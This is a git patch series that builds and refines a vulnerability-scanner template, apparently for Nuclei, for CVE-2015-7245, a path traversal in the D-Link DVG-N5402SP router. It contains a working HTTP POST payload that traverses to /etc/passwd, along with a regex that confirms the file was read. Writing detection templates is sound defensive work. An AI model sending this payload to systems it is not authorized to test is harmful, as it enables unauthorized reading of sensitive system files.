From ca25ff1b391f2b4d5fc62e12dcf507ec20a779fd Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 16 Aug 2022 11:32:51 +0900 Subject: [PATCH 1/3] Create CVE-2015-7245.yaml --- CVE-2015-7245.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 CVE-2015-7245.yaml diff --git a/CVE-2015-7245.yaml b/CVE-2015-7245.yaml new file mode 100644 index 0000000000..28a8b9d1b1 --- /dev/null +++ b/CVE-2015-7245.yaml @@ -0,0 +1,29 @@ +id: CVE-2015-7245 + +info: + name: D-Link DVG-N5402SP - Path Traversal + author: 0x_Akoko + severity: high + tags: cve,cve2015,dlink,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-7245 + cwe-id: CWE-22 + description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. + reference: + - https://www.cvedetails.com/cve/CVE-2015-7245 + - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html + +requests: + - method: POST + path: + - "{{BaseURL}}/cgibin/webproc" + + body: "getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh" + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body From 20d5d7b7fbcdbea690bce40dbde223c6ee905c97 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Sep 2022 11:20:32 +0530 Subject: [PATCH 2/3] Update and rename CVE-2015-7245.yaml to cves/2015/CVE-2015-7245.yaml --- CVE-2015-7245.yaml => cves/2015/CVE-2015-7245.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename CVE-2015-7245.yaml => cves/2015/CVE-2015-7245.yaml (91%) diff --git a/CVE-2015-7245.yaml b/cves/2015/CVE-2015-7245.yaml similarity index 91% rename from CVE-2015-7245.yaml rename to cves/2015/CVE-2015-7245.yaml index 28a8b9d1b1..35671e6ab9 100644 --- a/CVE-2015-7245.yaml +++ b/cves/2015/CVE-2015-7245.yaml @@ -4,16 +4,18 @@ info: name: D-Link DVG-N5402SP - Path Traversal author: 0x_Akoko severity: high - tags: cve,cve2015,dlink,lfi + description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. + reference: + - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html + - https://www.exploit-db.com/exploits/39409/ + - https://www.cvedetails.com/cve/CVE-2015-7245 + - https://nvd.nist.gov/vuln/detail/CVE-2015-7245 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. - reference: - - https://www.cvedetails.com/cve/CVE-2015-7245 - - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html + tags: cve,cve2015,dlink,lfi requests: - method: POST From 41bffb12970c308b92eef19201fe62e598106960 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Sep 2022 11:33:10 +0530 Subject: [PATCH 3/3] Update CVE-2015-7245.yaml --- cves/2015/CVE-2015-7245.yaml | 18 ++++++++---------- 1 file changed, 8 insertions(+), 10 deletions(-) diff --git a/cves/2015/CVE-2015-7245.yaml b/cves/2015/CVE-2015-7245.yaml index 35671e6ab9..a55e28a577 100644 --- a/cves/2015/CVE-2015-7245.yaml +++ b/cves/2015/CVE-2015-7245.yaml @@ -4,28 +4,26 @@ info: name: D-Link DVG-N5402SP - Path Traversal author: 0x_Akoko severity: high - description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. + description: | + Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. reference: - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html - https://www.exploit-db.com/exploits/39409/ - - https://www.cvedetails.com/cve/CVE-2015-7245 - https://nvd.nist.gov/vuln/detail/CVE-2015-7245 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 cve-id: CVE-2015-7245 - cwe-id: CWE-22 tags: cve,cve2015,dlink,lfi requests: - - method: POST - path: - - "{{BaseURL}}/cgibin/webproc" + - raw: + - | + POST /cgibin/webproc HTTP/1.1 + Host: {{Hostname}} - body: "getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh" + getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body